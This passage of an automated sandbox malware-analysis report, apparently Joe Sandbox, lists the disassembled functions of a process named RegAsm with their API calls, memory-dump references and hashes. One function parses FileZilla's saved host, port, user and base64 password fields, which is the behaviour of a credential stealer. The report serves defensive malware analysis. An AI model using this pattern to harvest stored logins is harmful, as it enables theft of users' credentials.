                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF09AB6900038BBD710ABDAAC099BFB7FDEF48B02F00114AFA45D2180E6784950D3B4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B720
                                                                                                                                                                                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C73B75A
                                                                                                                                                                                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,6C720BA4,00000000,?,0000001C,?,?,00000000,?,6C718E44,?,00000000,?,6C720BA4), ref: 6C73B760
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 304294125-0
                                                                                                                                                                                                                                                    • Opcode ID: 5dd71325973ad88fe60e4eee48053d83aa0d9da33b56bb3957aed5dc87aa23d2
                                                                                                                                                                                                                                                    • Instruction ID: c5676704675a46d021c3dabf85f1165bc3d2b301df7b42eb4c2e55c60e351e56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd71325973ad88fe60e4eee48053d83aa0d9da33b56bb3957aed5dc87aa23d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0AFB0A0022CAEEF019AB1CE8CBEEB7BDDB0431AF50613AE515615C1D774A58CC660
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E03D4,?), ref: 6C73B955
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B9A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1889792194-0
                                                                                                                                                                                                                                                    • Opcode ID: 9d498d55df6550144d671d5c2bddaffe953b585782aa79fc211d5164e26f78f8
                                                                                                                                                                                                                                                    • Instruction ID: 2030d9035b76b60a97dc8c8c6bd7150a35d677a0f9f984cbfe068dffb4e6baac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d498d55df6550144d671d5c2bddaffe953b585782aa79fc211d5164e26f78f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41A271F0161D9BDF04CFA9D984ADEBBB6FF88314F24813AE409A7744DB30A9458B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0041F398 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(0041F356), ref: 0041F39D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 337adc5baee7dcba3e409034c921b94744581b00ed52da9119a04e8e66f87466
                                                                                                                                                                                                                                                    • Instruction ID: b6763dbefe703962a569a259006443cdc4209c638d5c317421f10fb9fbbbe72b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337adc5baee7dcba3e409034c921b94744581b00ed52da9119a04e8e66f87466
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 009002B0352104C68A105B716C09545A5B05B9861379544756411C5068DB68914AB53D
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040BDD0 Relevance: 93.4, APIs: 62, Instructions: 429memorystringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040BC80: lstrlenA.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BCCF
                                                                                                                                                                                                                                                      • Part of subcall function 0040BC80: strchr.MSVCRT ref: 0040BCE5
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630,?,75AA5460,00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF), ref: 0040BE31
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000,?), ref: 0040BE38
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000), ref: 0040BE4D
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420D11,000000FF,?,0040C630,?,00000000,?), ref: 0040BE54
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BE71
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040BE82
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420D11), ref: 0040BE89
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEB3
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BEBA
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BEC6
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BECD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BEE2
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BEE9
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BF1A
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF21
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BF40
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF47
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BF53
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BF5A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BF6F
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BF76
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BF99
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BFA7
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BFAE
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BFD6
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040BFDD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040BFE9
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BFF0
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C005
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C00C
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C02C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C03D
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C044
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C04B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C05D
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C064
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C085
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C0AB
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0C2
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C0C9
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C0D0
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C0DF
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C0E6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C0F4
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C0FB
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C117
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C123
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C12A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C157
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C15E
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0040C630), ref: 0040C16A
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040C171
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040C187
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C196
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C19D
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C211
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C221
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2B0
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040C2B7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662779188-0
                                                                                                                                                                                                                                                    • Opcode ID: b800f4712dbf29e3d961cb9670fd45effb9da492dafbde318e8ec9388cdfc4eb
                                                                                                                                                                                                                                                    • Instruction ID: 959c6f8cf0a82b0143dc722e3d37d5731d0bb7bf2315a719624b2c4923ae8926
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b800f4712dbf29e3d961cb9670fd45effb9da492dafbde318e8ec9388cdfc4eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE14476900225ABDB10EBE4DC49EEF7B7DFF45704F10552AFA02B3291DB385A048BA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7355F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C70E1A5), ref: 6C735606
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C70E1A5), ref: 6C73560F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C735633
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C73563D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C73566C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C73567D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C735696
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C7356B2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C7356CB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C7356E4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C7356FD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C735716
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C73572F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C735748
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C735761
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C73577A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C735793
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C7357A8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C7357BD
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C7357D5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C7357EA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C7357FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                    • Opcode ID: ced22ec9b650b6ae24c812dc4b37c73ff8d5c3ba999052d2c9e53b3123e873b0
                                                                                                                                                                                                                                                    • Instruction ID: 4c2d771c7b2bfa41d27756438a2037fdd15881f3a4ec74be16ba619f7b144625
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ced22ec9b650b6ae24c812dc4b37c73ff8d5c3ba999052d2c9e53b3123e873b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F5177707017539BEB419F36AF449763AFCAB0B245B945439ED26E2A42EF74DA00CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default), ref: 6C71CC27
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java), ref: 6C71CC3D
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C74FE98), ref: 6C71CC56
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf), ref: 6C71CC6C
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio), ref: 6C71CC82
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio), ref: 6C71CC98
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall), ref: 6C71CCAE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C71CCC4
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C71CCDA
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C71CCEC
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C71CCFE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C71CD14
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C71CD82
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C71CD98
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C71CDAE
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C71CDC4
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C71CDDA
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C71CDF0
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C71CE06
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C71CE1C
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C71CE32
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C71CE48
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C71CE5E
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C71CE74
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C71CE8A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                    • Opcode ID: 9bcb29b908e99343f3d5371c11121b4a8d8eaa55197a1a88afc6558c1d48f8d4
                                                                                                                                                                                                                                                    • Instruction ID: 71f9d54ba6b30e0a6f14e590b6df5fc572ab6eb392ce604f717fdda2b3d316f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bcb29b908e99343f3d5371c11121b4a8d8eaa55197a1a88afc6558c1d48f8d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A51A9C1A5D62553FB0031956F1BBAA1409EF5324BF1C843AED8AA1E80FF05D71D86B7
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040C8D9 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 292stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Host: ), ref: 0040CAC2
